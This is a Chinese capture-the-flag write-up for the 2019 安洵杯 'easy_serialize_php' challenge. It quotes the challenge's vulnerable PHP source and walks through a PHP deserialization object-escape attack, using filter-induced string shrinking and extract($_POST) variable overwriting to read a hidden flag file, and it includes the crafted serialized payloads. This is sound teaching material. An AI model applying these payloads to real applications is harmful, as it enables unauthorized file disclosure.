[安洵杯 2019]easy_serialize_php

[安洵杯 2019]easy_serialize_php

反序列化对象逃逸
一般有两种方法
第一种是序列化之后的对象经过过滤之后导致的字符增加 如【0CTF】2016 piapiapia中 where->hacker导致的字符增加了 但是对象长度不变
第二种就是本题序列化后对象过滤导致字符减少

1.源码

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

最后一段代码逻辑让咱们输入phpinfo试试
进phpinfo之后能看到flag所在的文件
最后一个判断又是file_get_contents 可以读文件 那思路应该就是让base64_decode($userinfo[‘img’])的值是flag所在的文件名

extract($_POST);

这里有变量覆盖可以改变

2.反序列化逃逸

$_SESSION["user"]='flagflagflagflagflagflag';
$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';
echo serialize($_SESSION);
echo filter(serialize($_SESSION));

结果分别为:
a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}    
a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}    

在s:24:这个位置经过过滤就会导致后面的24个字符被赋值给了user
经过构造之后刚好后面就是s:3:“img” 这样我们就把我们想要img是多少通过这种方式传入了

3.解题

这时候传参需要传入?f=show_image
然后我们需要POST传入我们构造的键对

$_SESSION['flagflag']='";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';

这个时候序列化之后变为

a:1:{s:8:"flagflag";s:51:"";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";}  

经过过滤就变为

a:1:{s:8:"";s:51:"";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";}

这样我门就把里面的 ";s:51:"做为s:8的变量名,变量值为aaa,然后就讲后面的img变量覆盖了
后面的值就可控了

传入之后会看到

$flag = 'flag in /d0g3_fllllllag';

之后我们就把后面的base64值变为上面的目录就可以了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值